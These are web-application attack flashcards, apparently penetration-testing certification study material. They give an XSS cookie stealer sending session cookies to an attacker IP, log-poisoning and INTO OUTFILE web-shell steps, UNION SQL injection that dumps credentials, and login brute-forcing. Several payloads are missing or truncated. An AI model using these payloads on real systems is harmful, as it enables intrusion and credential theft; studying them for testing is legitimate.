Web Application Attacks Flashcards
1
Q
What is the first thing you should do before launching an attack on a web server?
A
Discover the technology stack in use:
- Programming language and frameworks
- Web server software
- Database software
- Server operating system
2
Q
What are common web site enumeration steps?
A
- Inspect URLs: file extensions reveal programming language, such as .php, .jsp, .do, .html
- Inspect Page Content: debugger tools may display JavaScript frameworks, hidden input fields, comments, client-side controls within HTML, JavaScript
- View Response Headers: in Firefox the Network tab of the Web Developer menu
- Inspecting Site Maps: robots.txt, sitemap.xml; use curl to get
- Locate Administrator Consoles
3
Q
How would you use ‘curl’ to get robots.txt for google.com?
A
curl https://www.google.com/robots.txt
4
Q
What is the open source web server scanner?
A
Nikto
5
Q
How would you run Nikto against megacorpone.com for 30 seconds?
A
nikto -host=http://www.megacorpone.com -maxtime=30s
6
Q
How can you use Intruder to brute force a phpMyAdmin login page if there is a unique ‘set_session’ value and a ‘token’ value required for each login?
A
- In Positions Tab: select phypMyAdmin, set_session, password, and token values
- Select “Pitchfork” as the attack type
- Options Tab > Grep Extract > Add: define ‘grep’ extraction to begin after _session” value=” and end at “ />Log (this will grab the ‘set_session’ string)
- Add another Grep Extract: start grep extraction after en” value=” and end at “ />\n\n (this will grab the token value)
- Payloads Tab: for Payload set 1 is for the phpMyAdmin session cookie; set Payload Type to “Recursive Grep” and select the first Recursive Grep option set above
- Payloads Tab: Payload set 2 is for “set_session”; it needs to match the value of the “phpMyAdmin cookie”, so it is the same value as option 1
- Payloads Tab: Payload set 3 is for “password” and use a simple list of passwords
- Payloads Tab: Payload set 4 is for the token value; use the 2nd “Recursive Grep” option
7
Q
What would be your next action to take after successfully logging into phpMyAdmin console?
A
Run database SQL queries against user table to find credentials
8
Q
What allows XSS to take place?
A
Web application allowing unsanitized data, thereby allowing attackers to inject and potentially execute malicious code.
9
Q
Stored XSS
A
- aka Persistent XSS
- occurs when the exploit payload stored in a database or otherwise cached by a server
- the web application then retrieves this payload and displays it to anyone that views a vulnerable page
- a single stored XSS can therefore attack anyone that visits the page
10
Q
Reflected XSS
A
- usually include the payload in a crafted request or link
- the web application takes this value and places it into the page content
- this variant only attacks the person submitting the request or viewing the link
- often occur in search fields and results, as well as anywhere user input is included in error messages
11
Q
URL Encoding
A
- sometimes referred to as percent encoding
- used to convert non-ASCII characters in URLs
- Example: converting ‘space’ to %20
12
Q
HTML Encoding
A
- used to display characters that normally have special meaning, like tag elements
- Example: <, is the character reference for “
13
Q
What is a simple way to see if a web page is sanitizing data, or not?
A
- if there is a comment posting page, like for a blog post, you can enter ‘hello “ ; < > ‘ and see if the characters are posted as they are
- If the characters are posted as is, and not HTML encoded, the site does not sanitize user input
14
Q
What is a stealthy alternative to a XSS redirect?
A
- inject an invisible iframe into our XSS payload
- this will embed the file “report” into the HTML file
- once this payload has been submitted, any user that visits the page will connect back to our attack machine
15
Q
What are the two Cookie flags that are of most interest to an attacker?
A
- Secure
- HttpOnly
16
Q
What does the Secure flag in a Cookie do?
A
- instructs the browser to only send the cookie over encrypted connections, such as HTTPS
- this protects the Cookie from being sent in cleartext and captured over the network
17
Q
What does the HttpOnly flag in a Cookie do?
A
- instructs the browser to deny JavaScript access to the cookie
- if the HttpOnly flag is NOT set, we can use an XSS payload to steal the cookie
18
Q
How can the capture a victim’s PHPSESSID cookie?
A
- We can use JavaScript to read the value of the cookie and append it to an image URL that links back to our attack machine.
- The browser will read the image tag and send a GET request to our attack system with the victim’s cookie as part of the URL query string.
- To implement our cookie stealer, we need to modify our XSS payload as follows:
- new Image().src=”http://10.11.0.4/cool.jpg?output= “+document.cookie;
- When a victim visits the page with the application with this embedded script, their browser makes a connection to the 10.11.0.4 attacking machine and we receive:
- GET /cool.jpg?output=PHPSESSID=ua19spm8i3t1l9acl9m2tfi76 HTTP/1.1
- We can then use Cookie-Editor in Firefox to add the stolen cookie
19
Q
Directory Traversal Vulnerabilities
A
- aka Path Traversal
- allow attackers to gain unauthorized access to files within an application or files normally not accessible through a web interface, such as those outside of the web root directory
- occurs when input is poorly validated, granting an attacker the ability to manipulate file paths with “../” or “.." characters
20
Q
If we see the end of a URL containing “/menu?file=current_menu.php”…how should we attack this for Directory Traversal Vulnerabilities?
A
- First, change the “file” value to something arbitrary like “file=old.php”
- If there is an error message with a full file path, then it is likely vulnerable
- Next, try file=c:\windows\system32\drivers\etc\hosts
21
Q
What is a file inclusion vulnerability?
A
- allows an attacker to include a file into the application’s running code
- Local File Inclusion (LFI) occurs when the included file is loaded from the same web server
- Remote File Inclusion (RFI) occurs when the included file is loaded from an external source.
- This is typically found in PHP applications
22
Q
In order to exploit a file inclusion vulnerability, we is required?
A
- ability to execute code
- ability to write our shell payload somewhere
23
Q
How can you exploit LFI using Log Files?
A
- We can try to inject code onto the server through log file poisoning
- Most application servers will log all URLs that are requested
- We can take advantage of this by submitting a request that includes PHP code
- Once the request is logged, we can use the log file in our LFI payload.
24
Q
Example LFI using Log File Poisoning?
A
- Start NC: nc -nv 10.11.0.22 80
- Send PHP Payload: echo ‘<pre>’ . shell_exec($_GET[‘cmd’]) . ‘</pre>;?>
* ** We get a 400 Bad Request error…but the request has been logged, so we can now do LFI Code Execution*** - Exploit LFI Vulnerability: http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig
* ** Once the URL is sent to the web server, the output will be the ‘access.log’ file and then ‘ipconfig’ executed
25
How can you exploit LFI with PHP Wrappers; provide an example?
- we can use the 'data' wrapper to embed inline data as part of the URL with plaintext or base64 encoded data
- this wrapper provides us with an alternative payload when we cannot poison a local file with PHP code
- we start with "data:" followed by the type of data...in this case "text/plain"
- we follow this with a comma to mark the start of the contents, in this case "hello world"
- - http://10.11.0.22/menu.php?file=data:text/plain,hello world
26
Example: execute code by exploiting LFI with PHP Wrappers?
http://10.11.0.22/menu.php?file=data:text/plain,
27
Example: What is a basic SQL Injection attack?
- - select * from users where name = 'tom' or 1=1;#' and password = 'jones';
* ** The '#' is a comment marker in MySQL/MariaDB, and effectively removes the rest of the statement ***
28
Example: What is a basic SQL Injection attack where we limit the returned values to 1?
-- select * from users where name ='tom' or 1=1 LIMIT 1;#
29
What are the steps of Enumerating a Database via SQL Injection Attack in the URL?
1. Column number enumeration
2. Understand the layout of the output
3. Extract data from the database
30
How can you verify that the page /debug.php is vulnerable to SQL Injection?
1. http://10.11.0.22/debug.php?id='
| 2. If we get an error message regarding SQL syntax, then we know that we have SQL Injection
31
Given a page /degug.php that is vulnerable to SQL Injection, how do you enumerate the number of Columns in a table?
1. http://10.11.0.22/debug.php?id=1 order by 1
- - This query instructs the database to sort the results based on the values in the first column.
- - If there is at least one column in the query, the query is valid and the page with render without errors.
- - We can submit multiple queries, incrementing the 'order by' clause each time until the query generates an error, indicating that the maximum number of columns returned by the query in question has been exceeded.
2. Send to Repeater and increment the 'order by' clause by 1 until you receive an error in the response
32
If we have enumerated the number of columns in a table, how can we find out more about each column?
- - We can use the UNION statement to get an idea of which columns are being displayed on our screen
- - This new select state will return one row with three columns with values of 1, 2, and 3.
- - /debug.php?id=1 union all select 1, 2, 3
33
If we have enumerated the number of columns in a table, how can we find out what database software is being used?
-- /debug.php?id=1 union all select 1, 2, @@version
34
If we have enumerated the number of columns in a table, how can we find out what database user is being used?
-- /debug.php?id =1 union all select 1, 2, user()
35
If we have enumerated the number of columns in a table, how can we find out additional information such as Table names?
-- /debug.php?id=1 union all select 1, 2, table_name from information_schema.tables
36
If we have discovered a table named USERS, how can we find out the names of columns in this table?
-- /debug.php?id=1 union all select 1, 2, column_name from information_schema.columns where table_name='users'
37
From the table USERS, we discover columns named USERNAME and PASSWORD. How can we display information from these columns?
-- /debug.php?id=1 union all select 1, username, password from users
38
How can SQL Injection be leveraged for Code Execution?
-- /debug.php?id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')
39
How can SQL Injection be leveraged to create a malicious PHP file within the server's web root?
- -/debug.php?id=1 union all select 1, 2, "" into OUTFILE 'c:/xampp/htdocs/backdoor.php'
* ** This command produces an error message but this doesn't mean the file creation was unsuccessful
* ** Access the newly created 'backdoor.php' with a 'cmd' parameter such as 'ipconfig'
- - /backdoor.php?cmd=ipconfig
